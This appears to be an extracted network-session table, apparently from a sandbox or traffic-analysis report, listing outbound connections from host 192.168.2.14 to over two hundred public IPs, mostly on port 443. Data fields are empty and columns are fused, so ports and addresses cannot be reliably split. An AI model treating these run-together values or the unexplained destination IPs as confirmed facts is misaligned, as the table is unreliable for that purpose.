                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16527192.168.2.145762895.5.162.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16528192.168.2.1460394154.212.222.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16529192.168.2.1459760190.224.123.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16530192.168.2.145372639.132.233.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16531192.168.2.145789067.200.214.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16532192.168.2.144352462.71.147.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16533192.168.2.1451126136.47.232.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16534192.168.2.144750685.125.31.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16535192.168.2.1433494164.93.197.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16536192.168.2.1459622208.230.155.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16537192.168.2.1452388172.141.6.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16538192.168.2.145661659.219.96.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16539192.168.2.1456876148.13.108.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16540192.168.2.144563257.64.117.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16541192.168.2.145941271.111.96.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16542192.168.2.1440822175.214.118.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16543192.168.2.145170864.84.254.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16544192.168.2.1457872208.79.228.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16545192.168.2.1455682197.228.127.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16546192.168.2.144686485.49.136.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16547192.168.2.1448040152.97.5.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16548192.168.2.1448298144.113.225.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16549192.168.2.1445692142.246.126.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16550192.168.2.144753866.9.200.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16551192.168.2.1455510176.242.102.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16552192.168.2.1447980152.153.68.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16553192.168.2.1451134135.191.65.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16554192.168.2.144181896.158.144.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16555192.168.2.1437526119.61.6.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16556192.168.2.143756849.206.216.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16557192.168.2.144203886.157.112.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16558192.168.2.1454172139.39.85.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16559192.168.2.1435468201.133.104.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16560192.168.2.1445658180.204.233.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16561192.168.2.143489253.197.87.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16562192.168.2.1459080134.143.219.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16563192.168.2.143287668.243.160.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16564192.168.2.145355258.248.226.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16565192.168.2.1458970211.222.90.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16566192.168.2.143900638.27.55.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16567192.168.2.1453284207.58.177.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16568192.168.2.1445282209.86.249.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16569192.168.2.1443548209.221.173.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16570192.168.2.14602284.96.218.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16571192.168.2.14559981.199.60.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16572192.168.2.1456682170.246.23.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16573192.168.2.144948657.231.1.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16574192.168.2.144987665.26.96.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16575192.168.2.1440590106.146.79.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16576192.168.2.1449722103.81.147.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16577192.168.2.1440518184.245.88.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16578192.168.2.1459458133.234.13.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16579192.168.2.144014694.223.135.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16580192.168.2.145437276.16.237.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16581192.168.2.145249078.155.19.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16582192.168.2.1436242141.236.227.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16583192.168.2.1438154212.97.218.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16584192.168.2.143364038.105.133.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16585192.168.2.1455718142.84.70.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16586192.168.2.1433832193.82.160.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16587192.168.2.143917498.196.179.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16588192.168.2.1449904131.126.161.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16589192.168.2.1460210219.128.99.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16590192.168.2.1456526116.212.6.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16591192.168.2.145188699.140.114.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16592192.168.2.1442462165.89.125.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16593192.168.2.1451090109.36.110.98080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16594192.168.2.1437420103.249.41.408080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16595192.168.2.1454844144.138.68.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16596192.168.2.144718851.132.100.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16597192.168.2.1437838144.198.157.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16598192.168.2.1459128141.128.64.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16599192.168.2.1434810217.212.193.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16600192.168.2.14353801.16.83.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16601192.168.2.1457118144.141.232.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16602192.168.2.145373888.20.20.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16603192.168.2.143389277.63.167.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16604192.168.2.1435138106.149.242.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16605192.168.2.144755457.163.165.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16606192.168.2.1437366173.231.127.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16607192.168.2.1452342124.163.182.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16608192.168.2.1434140192.127.188.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16609192.168.2.1436916157.60.114.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16610192.168.2.1453536111.237.119.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16611192.168.2.145132238.24.224.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16612192.168.2.145347479.205.156.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16613192.168.2.143627845.46.162.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16614192.168.2.1434122168.178.139.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16615192.168.2.1459634201.180.237.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16616192.168.2.1437608223.60.254.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16617192.168.2.1443264113.32.181.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16618192.168.2.1437538186.185.102.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16619192.168.2.143404853.203.74.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16620192.168.2.145220293.222.175.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16621192.168.2.1435988100.158.242.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16622192.168.2.1442592121.127.41.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16623192.168.2.144496634.96.241.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16624192.168.2.143912019.146.4.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16625192.168.2.144745690.205.178.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16626192.168.2.14517562.191.220.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16627192.168.2.144401427.39.64.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16628192.168.2.14451265.178.87.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16629192.168.2.1460670151.108.64.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16630192.168.2.1442982182.180.18.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16631192.168.2.143602414.240.119.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16632192.168.2.1443706155.70.185.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16633192.168.2.1439318204.186.65.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16634192.168.2.1451504199.224.184.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16635192.168.2.1450338196.132.214.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16636192.168.2.145940677.135.57.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16637192.168.2.1458810116.214.251.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16638192.168.2.145707453.38.206.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16639192.168.2.1447238142.233.182.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16640192.168.2.1446072168.40.236.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16641192.168.2.1451692131.112.9.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16642192.168.2.1446724156.125.35.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16643192.168.2.145184057.122.60.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16644192.168.2.1444278136.52.101.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16645192.168.2.1444584178.63.72.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16646192.168.2.145724054.86.241.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16647192.168.2.1442156180.194.182.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16648192.168.2.1443936149.82.180.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16649192.168.2.144023438.61.201.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16650192.168.2.1454126109.159.195.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16651192.168.2.1444030185.17.237.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16652192.168.2.1448136123.151.84.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16653192.168.2.1435146100.152.254.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16654192.168.2.1440694106.1.124.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16655192.168.2.1435464213.102.17.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16656192.168.2.1446534129.77.111.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16657192.168.2.1459056126.214.67.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16658192.168.2.143277417.99.244.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16659192.168.2.1440170173.197.123.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16660192.168.2.144336657.237.161.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16661192.168.2.144786451.247.22.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16662192.168.2.144001675.87.164.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16663192.168.2.1437500168.180.0.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16664192.168.2.143352858.18.91.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16665192.168.2.1456198182.225.48.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16666192.168.2.1441106207.199.3.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16667192.168.2.1443886144.124.26.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16668192.168.2.145644038.112.208.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16669192.168.2.143297864.236.250.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16670192.168.2.1451766206.96.235.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16671192.168.2.1434902222.246.246.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16672192.168.2.143823293.25.62.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16673192.168.2.1455424100.56.202.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16674192.168.2.145748652.38.3.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16675192.168.2.145157451.166.69.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16676192.168.2.144626251.93.219.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16677192.168.2.144216258.255.249.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16678192.168.2.1437420165.132.191.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16679192.168.2.144090860.137.196.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16680192.168.2.1432816129.144.32.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16681192.168.2.1436888132.100.170.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16682192.168.2.145012848.175.7.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16683192.168.2.144442880.53.196.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16684192.168.2.144755251.219.184.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16685192.168.2.145309050.163.231.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16686192.168.2.145746076.104.67.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16687192.168.2.1448646136.109.211.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16688192.168.2.143971852.222.1.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16689192.168.2.143950018.115.220.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16690192.168.2.1433882102.205.181.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16691192.168.2.145349446.49.56.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16692192.168.2.1441488156.209.15.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16693192.168.2.145669462.66.0.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16694192.168.2.144851440.190.102.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16695192.168.2.144609488.75.146.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16696192.168.2.144026884.128.16.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16697192.168.2.1434674194.228.59.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16698192.168.2.143567267.140.194.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16699192.168.2.143668289.117.138.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16700192.168.2.1458760191.86.249.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16701192.168.2.1437322177.116.184.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16702192.168.2.1454894135.144.210.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16703192.168.2.143650252.241.177.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16704192.168.2.1454104195.19.194.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16705192.168.2.1437604137.21.39.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16706192.168.2.145209012.220.89.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16707192.168.2.144242850.11.179.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16708192.168.2.1452042154.241.28.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16709192.168.2.146024488.39.201.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16710192.168.2.143964083.17.75.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16711192.168.2.1449748118.248.210.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16712192.168.2.144540841.16.178.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16713192.168.2.1433054120.40.75.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16714192.168.2.1445594142.52.218.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16715192.168.2.1437092139.215.117.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16716192.168.2.1436462110.95.129.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16717192.168.2.1447106185.88.88.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16718192.168.2.143336485.128.234.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16719192.168.2.144978637.164.74.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16720192.168.2.1456700152.19.18.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16721192.168.2.1448940180.22.182.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16722192.168.2.14367405.182.203.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16723192.168.2.144517248.134.158.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16724192.168.2.1456952107.155.177.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16725192.168.2.1436180220.213.231.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16726192.168.2.1452570110.103.14.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16727192.168.2.1456922208.60.108.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16728192.168.2.1456244204.73.0.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16729192.168.2.143905439.52.171.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16730192.168.2.1458086206.85.222.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16731192.168.2.145765876.254.101.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16732192.168.2.1447992103.75.88.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16733192.168.2.143834258.109.245.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16734192.168.2.1436240197.112.117.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16735192.168.2.1452384182.234.47.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16736192.168.2.1458444105.183.245.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16737192.168.2.145452024.159.246.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16738192.168.2.1439578130.41.33.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16739192.168.2.1449884191.222.4.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16740192.168.2.144995680.159.241.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16741192.168.2.1458174165.232.89.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16742192.168.2.1449828192.80.109.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16743192.168.2.1443716117.197.172.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16744192.168.2.1444538173.167.99.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16745192.168.2.144784839.103.235.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16746192.168.2.1452422172.178.201.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16747192.168.2.1460254145.220.87.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16748192.168.2.145096046.96.203.162443
